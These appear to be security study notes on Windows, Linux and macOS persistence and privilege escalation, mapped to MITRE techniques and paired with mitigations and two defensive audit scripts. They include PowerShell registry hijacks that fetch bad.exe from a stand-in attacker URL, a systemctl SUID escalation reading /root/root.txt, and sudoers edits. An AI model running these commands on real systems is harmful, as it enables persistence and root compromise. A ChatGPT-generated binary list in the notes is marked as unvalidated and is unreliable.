export DB_NAME=$(echo $DB_SECRETS | jq -r '.name')
export DB_HOST=$(echo $DB_SECRETS | jq -r '.endpoint' | cut -d: -f1)
export DB_PASSWORD=$(echo $DB_SECRETS | jq -r '.password')
MYSQL_PWD=$DB_PASSWORD mysqldump --databases $DB_NAME --tables users -u $DB_USERNAME -h $DB_HOST > /tmp/$FILENAME.sql
aws kms encrypt --key-id alias/backup-$(unique_string) --plaintext fileb:///tmp/$FILENAME.sql --region $AWS_REGION | jq -r '.CiphertextBlob' > /tmp/$FILENAME.sql.enc
aws s3 cp /tmp/$FILENAME.sql.enc s3://sec510-backup-$(unique_string)
rm /tmp/$FILENAME.sql*

Policies

Windows

More about it here. This could be used to allow some legit software.

  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run (when specified in the policy settings)
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run (when specified in the policy settings)

Office

📚 References: More here.

IPC

Windows

Shell Extension Handlers

Computer\HKCU\Software\Classes\*\shellex\ContextMenuHandlers. Same under HKLM. ⚠️ No admin credentials are needed to add a value here under HKCU (HKLM does require them). The GUID here is the same as the one listed in the CLSID subkey. To add a malicious extension one needs to create a unique GUID, add a subkey to CLSID, add the path to the dll, and then add a shell extension in the registry above using the same GUID. Use 🛠 OLE/COM Object Viewer to see all COM objects registered. Simply clicking an image or an archive file may trigger a malicious act.

$Path="HKCU:\Software\Classes\*\shellex\ContextMenuHandlers\BadExt"
$Name="(Default)"
$Value="{GUID}"

New-Item -Path $Path -Force
New-ItemProperty -Path $Path -Name $Name -Value $Value

$Path1="HKCU:\Software\Classes\CLSID\{GUID}\InprocServer32" # example
$Name1="(Default)"
$Value1="C:\tmp\bad.exe"

New-Item -Path $Path1 -Force
New-ItemProperty -Path $Path1 -Name $Name1 -Value $Value1

$Url="https://attackersurl/bad.exe"
$Out="C:\tmp\bad.exe"

Invoke-WebRequest -Uri $Url -OutFile $Out

COM Hijack

In Process Monitor, filter on Path contains CLSID and Result is NAME NOT FOUND. The entry exists in HKLM\Software\Classes\CLSID\{GUID} but doesn’t exist at HKCU\Software\Classes\CLSID\{GUID}: the lookup tries HKCU first and falls back to HKLM, so that’s where an entry under HKCU can be added. PowerShell needs to be used, since it’s a trusted application for registry access.

$Path1="HKCU:\Software\Classes\CLSID\{GUID}\InprocServer32" # example
$Name1="(Default)"
$Value1="C:\tmp\bad.exe"

New-Item -Path $Path1 -Force
New-ItemProperty -Path $Path1 -Name $Name1 -Value $Value1

$Url="https://attackersurl/bad.exe"
$Out="C:\tmp\bad.exe"

Invoke-WebRequest -Uri $Url -OutFile $Out

Extension Handler Hijacking

Computer\HKCR\, subkeys Open and Command. An attacker can’t change HKCR or HKLM, but can change HKCU and HKU without admin privileges. Using a proxy within Command helps to stay unnoticed: proxy.exe "{path/to/real/app}" (starts the meterpreter, for example, then launches the real application). ⚠️ PowerShell is not necessary; the HKU hive can be edited without it.

New-PSDrive -PSProvider Registry -Name HKU -Root HKEY_USERS
$Path="HKU:\{SID}_Classes\VLC.mp4\shell\Open\Command"
$Name="(Default)"
$Value="C:\tmp\bad.exe"

New-Item -Path $Path -Force
New-ItemProperty -Path $Path -Name $Name -Value $Value

$Url="https://attackersurl/bad.exe"
$Out="C:\tmp\bad.exe"

Invoke-WebRequest -Uri $Url -OutFile $Out

Read more about the above techniques: Wipe the drive! Stealthy Malware Persistence - Part 1 and Wipe the drive! Stealthy Malware Persistence - Part 2.
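An added example (not from the page or the linked writeups) of how to review the registry for the three hijacks described above: given exported CLSID-to-InprocServer32 maps for HKLM and HKCU plus the ContextMenuHandlers subkeys, it reports HKCU entries that shadow a machine-wide CLSID, servers that live in user-writable paths, and handlers registered only under HKCU or pointing at no CLSID at all. The snapshot dictionaries are constructed placeholders; on a live host they would be filled from winreg or a .reg export.

```python
# Constructed registry snapshot: CLSID -> InprocServer32 default value, per hive, plus the
# ContextMenuHandlers subkeys (name -> CLSID) found under HKCU\Software\Classes\*\shellex.
# GUIDs and paths are placeholders, not real components.
HKLM_CLSID = {
    "{00000000-0000-0000-0000-000000000001}": r"C:\Windows\System32\shell32.dll",
    "{00000000-0000-0000-0000-000000000002}": r"C:\Program Files\Vendor\VendorExt.dll",
}
HKCU_CLSID = {
    "{00000000-0000-0000-0000-000000000002}": r"C:\Users\alice\AppData\Roaming\Vendor\VendorExt.dll",
    "{00000000-0000-0000-0000-000000000003}": r"C:\tmp\handler.dll",
}
CONTEXT_MENU_HANDLERS = {
    "Builtin":    "{00000000-0000-0000-0000-000000000001}",
    "VendorMenu": "{00000000-0000-0000-0000-000000000002}",
    "NewExt":     "{00000000-0000-0000-0000-000000000003}",
}

# Path fragments a standard user can normally write to
USER_WRITABLE = ("\\users\\", "\\tmp\\", "\\temp\\", "\\programdata\\", "\\appdata\\")


def is_user_writable(path):
    return any(frag in path.lower() for frag in USER_WRITABLE)


def audit(hklm_clsid, hkcu_clsid, handlers):
    """Return {clsid: [reasons]} for COM servers that deserve review.
    Because the lookup consults HKCU\\Software\\Classes before HKLM (as noted above), an HKCU
    entry for a CLSID that also exists in HKLM silently replaces the machine-wide server."""
    findings = {}

    def add(clsid, reason):
        findings.setdefault(clsid, []).append(reason)

    for clsid, server in hkcu_clsid.items():
        if clsid in hklm_clsid:
            add(clsid, "HKCU entry shadows HKLM server %s with %s" % (hklm_clsid[clsid], server))
        if is_user_writable(server):
            add(clsid, "InprocServer32 points into a user-writable path: " + server)
    for name, clsid in handlers.items():
        if clsid in hklm_clsid:
            continue                                   # machine-wide registration, nothing to add
        if clsid in hkcu_clsid:
            add(clsid, "context menu handler '%s' is registered only in HKCU" % name)
        else:
            add(clsid, "context menu handler '%s' points at an unregistered CLSID" % name)
    return findings


if __name__ == "__main__":
    for clsid, reasons in audit(HKLM_CLSID, HKCU_CLSID, CONTEXT_MENU_HANDLERS).items():
        print(clsid)
        for reason in reasons:
            print("   -", reason)
```

The same shadowing check applies to the Open\Command keys of the extension-handler hijack: compare the per-user value against the HKLM one and review every difference.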

Elevation Control Mechanism Abuse

Linux & macOS

setuid and setgid

Platforms: macOS, Linux MITRE: https://attack.mitre.org/techniques/T1548/001/

setuid or setgid bits set in UNIX. chmod u+s [file] or chmod 4777 [file] sets the setuid bit; chmod g+s or chmod 2775 sets the setgid bit. Look for files with the bit set: find / -perm -4000 2>/dev/null for setuid and find / -perm -2000 2>/dev/null for setgid (the -4000 form works with both GNU and BSD find; the older +4000 form is only accepted by BSD find).

When a user runs an executable file with the setuid bit set, the real user ID (RUID) of the process is set to the user ID of the user who ran the file, while the effective user ID (EUID) is set to the user ID of the file owner. This means that the process runs with the privileges of the file owner while still retaining the identity of the user who executed the file.

One of the files with this bit set is systemctl. This process is used to start services, for example, an apache server: sudo systemctl start apache2. However, if this file is assigned SUID permissions by mistake, it can be used for privilege escalation.

eop=$(mktemp).service # create a temp file name with a random unique suffix and store it in the eop variable
echo '[Service]
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $eop # write the unit file; systemctl will run the command given in ExecStart
# ❗️ Paste the echo above as one command: when typed interactively the shell shows a ">" continuation prompt on each line, which is not part of the command
# ❗️ I have added touch $eop but it's not required (it was in my case, because I had an error)

/bin/systemctl link $eop # creates a symbolic link to the unit file named in $eop under /etc/systemd/system/, so the service can be managed with systemctl commands

/bin/systemctl enable --now $eop # "enable" makes the service start at boot time; "--now" starts it immediately

Below is a list generated by ChatGPT (to be validated) of other executables that commonly carry this bit and are potentially useful to an attacker:

  • /usr/bin/passwd: Used to change user passwords. A vulnerability in this file could allow an attacker to gain root privileges.
  • /usr/bin/chsh: Used to change a user's default shell. A vulnerability in this file could allow an attacker to gain root privileges.
  • /usr/bin/chfn: Used to change a user's finger information. A vulnerability in this file could allow an attacker to gain root privileges.
  • /usr/bin/sudo: Used to run commands as another user, typically root. A vulnerability in this file could allow an attacker to gain root privileges.
  • /usr/bin/sudoedit: Used to edit files as another user, typically root. A vulnerability in this file could allow an attacker to gain root privileges.

Mitigation: Don’t set this bit on binaries with known shell escape vulnerabilities.
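An added example (not from the page) of the audit behind the find commands above: it classifies setuid/setgid files against a baseline of binaries that are expected to carry the bit, so a systemctl with mode 4755 shows up as NOT IN BASELINE. The baseline and SAMPLE_ENTRIES are constructed (a real baseline comes from a known-good image of the same distribution); walk_modes() is the live-host equivalent that feeds classify() from the file system.

```python
import os
import stat

# Baseline of setuid/setgid binaries expected on this host. Constructed for the example; in practice
# generate it from a known-good image of the same distribution and keep it under change control.
BASELINE = {"/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/sudo", "/usr/bin/sudoedit"}


def special_bits(mode):
    """Names of the special bits set in a mode, e.g. ["setuid"] for 4755."""
    bits = []
    if mode & stat.S_ISUID:
        bits.append("setuid")
    if mode & stat.S_ISGID:
        bits.append("setgid")
    return bits


def classify(entries, baseline=BASELINE):
    """entries: iterable of (path, st_mode). Returns [(path, bits, status)] for regular files with
    setuid/setgid set; status says whether the file is in the baseline. Directories with setgid
    (group-inherit semantics) are skipped because they do not execute as anyone."""
    out = []
    for path, mode in entries:
        if not stat.S_ISREG(mode):
            continue
        bits = special_bits(mode)
        if bits:
            out.append((path, bits, "expected" if path in baseline else "NOT IN BASELINE"))
    return out


def walk_modes(root="/"):
    """Yield (path, st_mode) for every file under root; feeds classify() on a live host."""
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                yield path, os.lstat(path).st_mode
            except OSError:            # unreadable or vanished entry: skip, keep scanning
                continue


# Constructed modes standing in for os.lstat() results; no file system access needed
SAMPLE_ENTRIES = [
    ("/usr/bin/passwd", stat.S_IFREG | 0o4755),
    ("/usr/bin/systemctl", stat.S_IFREG | 0o4755),   # the misconfiguration discussed above
    ("/usr/bin/ls", stat.S_IFREG | 0o755),
    ("/usr/bin/wall", stat.S_IFREG | 0o2755),
    ("/srv/shared", stat.S_IFDIR | 0o2775),
]

if __name__ == "__main__":
    for path, bits, status in classify(SAMPLE_ENTRIES):
        print(path, "+".join(bits), status)
```

On a live host, classify(walk_modes("/usr")) lists every special-bit binary; anything reported as NOT IN BASELINE is either a baseline gap to document or a change to investigate.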

Sudo caching

Platforms: macOS, Linux MITRE: https://attack.mitre.org/techniques/T1548/003/

One can add admin ALL=(ALL) NOPASSWD: ALL to the /etc/sudoers file. Also, malware might monitor the /var/db/sudo timestamp files and execute when possible. Also, it’s possible to disable terminal window isolation, like this: echo 'Defaults !tty_tickets' >> /etc/sudoers.

AuthorizationExecuteWithPrivileges

Platforms: macOS MITRE: https://attack.mitre.org/techniques/T1548/004/

The AuthorizationExecuteWithPrivileges API (macOS) brings up a prompt and asks the user to grant permissions. The trick is to be convincing enough that the user grants them. Mitigation: set the preferences to block all programs not downloaded from the App Store.

Mitigations: least privilege, proper configuration, defense in-depth, zero trust.

Writeups 📚:

Windows

UAC Abuse

Platforms: Windows MITRE: https://attack.mitre.org/techniques/T1548/002/

Abusing UAC on Windows.

Tokens

MITRE: https://attack.mitre.org/techniques/T1134/, https://attack.mitre.org/techniques/T1134/001/, https://attack.mitre.org/techniques/T1134/002/, https://attack.mitre.org/techniques/T1134/003/, https://attack.mitre.org/techniques/T1134/004/, https://attack.mitre.org/techniques/T1134/005/
Actors: https://attack.mitre.org/groups/G0032/

Techniques:

  • Token impersonation.
  • runas or CreateProcessWithTokenW to create a process with the rights of another user.
  • Spoof the parent process ID.
  • Windows. SID-history injection. By injecting a fake SID into the SID history of a user account, an attacker can create a new identity with additional access rights without raising any alarms. 🚨 Needs elevated privileges. The SID history is stored in an attribute of the user object in the AD database. The attribute is named “SIDHistory” and can be viewed and modified using the Active Directory Users and Computers (ADUC) management console or other AD management tools.

Kernel Modules and Extensions

Linux

LKM

LKM for Linux. Drivers are one type of kernel extension.

XDG

https://attack.mitre.org/techniques/T1547/013/

macOS

kext

kext for macOS. kextload and kextunload. These need to be signed with a certificate approved by Apple; otherwise, to load the extension one needs to disable SIP. That’s probably the reason why RAM cannot be dumped on macOS with SIP enabled. Replaced by System Extensions but still usable.

reopen

Remember the “Reopen windows when logging back in” prompt on macOS? When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist within the ~/Library/Preferences/ByHost directory. Applications listed in this file are automatically reopened upon the user’s next logon.

Windows

LSASS driver

Shortcuts

Abuse shortcuts in the startup folder to execute their tools and achieve persistence

Port Monitors

  1. AddMonitor API call. spoolsv.exe runs under SYSTEM privileges.
  2. HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors (option #2)
    1. Local Port
    2. Standard TCP/IP Port
    3. USB Monitor
    4. WSD Port

Print processors are DLLs loaded by the print spooler service, spoolsv.exe (SYSTEM permissions, loaded during boot).

  1. AddPrintProcessor, callable by an account that holds SeLoadDriverPrivilege.
  2. Adding the HKLM\SYSTEM\[CurrentControlSet or ControlSet001]\Control\Print\Environments\[Windows architecture: e.g., Windows x64]\Print Processors\[user defined]\Driver registry key that points to the DLL.

References


macOS

Wardle, Patrick. The Art of Mac Malware

PEASS

Detects possible privilege-escalation (PE) vectors on a Windows/Linux/macOS machine.

GTFOBins

https://gtfobins.github.io/